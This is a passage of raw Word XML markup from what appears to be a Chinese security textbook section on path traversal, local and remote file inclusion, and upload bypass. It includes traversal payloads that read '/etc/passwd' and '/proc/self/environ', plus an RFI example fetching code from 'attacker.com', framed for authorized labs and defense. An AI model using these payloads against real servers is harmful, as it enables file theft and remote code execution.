        <w:t xml:space="preserve"> HMAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与签名算法的密码学基础讲解，可用于深化对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">签名模型的理解。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="203"/>
    <w:bookmarkStart w:id="204" w:name="目录遍历与文件包含lfirfi文件上传绕过"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录遍历与文件包含（LFI/RFI）·文件上传绕过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用安全中，未经恰当防护的文件操作接口往往同时暴露三种高度关联的脆弱性：目录遍历（Path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Traversal）、文件包含（File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Inclusion）与文件上传绕过（File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Upload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypass）。将视线从前述的身份认证与会话安全移开，文件操作漏洞构成另一大攻击面——三者的共同根源在于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">应用将用户可控的输入拼接进文件系统路径，而未能严格限制最终解析到的真实文件位置或文件类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。攻击者由此可越权读取敏感文件（如配置文件、密码散列、源码），甚至通过包含恶意文件或上传可执行脚本获得远程命令执行能力；防御者则需通过路径规范化、白名单校验、最小权限隔离与行为监控，彻底切断数据流中引入不可信路径的机会。本节先剖析三类漏洞的第一性原理，再以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机作为授权实验环境，演示基本检测与利用思路，最后给出纵深防御方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有命令与示例仅限读者在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">自建的隔离实验环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">官方授权的靶机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA、OWASP Multillidae、HackTheBox、TryHackMe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等平台）中执行；实验网络必须与生产环境及互联网物理或逻辑隔离。未经系统所有者明确书面授权，对任何非自有系统实施路径遍历、文件包含或上传攻击均属违法行为，可能承担刑事责任。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="204"/>
    <w:bookmarkEnd w:id="205"/>
    <w:bookmarkStart w:id="206" w:name="攻击者与防御者的视角"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者与防御者的视角</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从攻击者角度看，文件操作功能是直通服务器文件系统的一扇窗。当</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数指定“要加载的页面”、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“要显示的图片”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或“用户头像”时，其底层代码很可能是类似</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">include("/var/www/pages/" + $_GET['page'] + ".php")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的拼接。如果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">page</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数的值未经清洗，攻击者就可以将路径向上回溯（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），脱离预期的根目录，窃取系统文件；若服务器甚至允许通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拉取远程资源并执行，则可能造成远程文件包含（RFI）。而文件上传点若仅依赖客户端验证或脆弱的黑名单检测，攻击者便能将可执行脚本伪装为图像上传，获得具有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行权限的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">webshell——这些攻击的核心假设都是“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">用户输入可以安全地作为路径或文件内容的一部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">”，而这个假设正是蓝队必须打破的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御者必须正视的现实是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">应用程序在任何时候都不应信任用户提供的路径或文件名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。正如身份认证必须假设口令可能被猜测、会话令牌可能被固定，文件操作也必须假设每一个来自客户端的路径参数都是恶意的。防御逻辑需要将输入规格化为规范的绝对路径，然后与白名单许可的目录前缀进行比对（路径规范化）；对于文件包含，除本地区分严格的分类外，必须彻底禁用远程包含功能；对于文件上传，仅接受业务必需的文件类型，并对存储目录实施严格的执行权限控制。同时，监控系统应对异常的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">序列、非业务时段的敏感文件访问以及上传目录中的脚本执行尝试发出告警。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="206"/>
    <w:bookmarkStart w:id="210" w:name="漏洞机理深度分析"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞机理深度分析</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="207" w:name="路径遍历打破沙盒的纵向移动"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路径遍历：打破沙盒的纵向移动</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路径遍历（Path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Traversal）的本质是在文件读写或查询操作中，攻击者通过插入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">序列（或编码变种），使最终解析的路径落到应用预期目录之外。这类漏洞常见于文件下载、模板加载、日志查看等功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：设想一座图书馆只允许读者借阅“公共阅览室”里的书，但读者可以在索书单上写</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">../珍本库/珍本书</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，而馆员不检查就直接按字面去取书，结果珍本也被拿出了。这里“公共阅览室”就是开发者设定的基础目录（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/images/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">就是向上翻的指令，攻击者就可以访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、应用源码、数据库配置文件等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">标准机制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Unix </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件系统中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">..</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表示父目录；在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">..\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。因此精心构造的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以层层回溯到根，再进入任意子目录。许多</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用会简单地用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">include($_GET['file'])</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">readfile($_GET['path'])</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">读取文件，若未采取防御，遍历攻击即可成功。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="207"/>
    <w:bookmarkStart w:id="208" w:name="文件包含从读到执行的跃升"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件包含：从读到执行的跃升</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件包含漏洞分为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">本地文件包含（LFI）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">远程文件包含（RFI）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。当应用不仅读取文件内容，而且将其作为代码执行（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">include</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">require</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，JSP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@include</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）时，攻击者便获得从信息泄露升级到远程代码执行（RCE）的通道。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">LFI（Local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> File </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Inclusion，本地文件包含）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者通过路径遍历让服务端包含并执行服务器上的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">现有文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。例如，通过将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../../proc/self/environ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Apache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问日志文件注入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码，再通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包含该文件，即可执行任意命令。这是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通往</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RCE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的经典概念路径，具体技术涉及日志污染、session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件注入等，其原理是攻击者先向某个服务器可控的文件中写入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码，再通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包含该文件触发代码执行。虽然本书不提供完整的武器化利用链，但务必理解其中的逻辑：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">包含点将数据转化为代码，而攻击者可以控制被包含的数据内容</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">RFI（Remote</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> File </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Inclusion，远程文件包含）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：如果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">include</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">require</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数允许加载远程</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">URL（即</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_include</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置中开启），攻击者可以直接让服务器包含自己控制的外部资源（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://attacker.com/shell.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），从而实现一键</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE。因此</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的危害通常更直接，但现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">默认已禁该选项（7.4+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本），然而遗留系统或配置失当的环境依然存在。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无论是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
